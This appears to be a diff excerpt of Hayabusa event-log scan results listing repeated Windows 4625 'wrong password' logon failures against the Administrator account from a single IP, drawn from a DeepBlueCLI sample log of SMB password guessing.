+2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
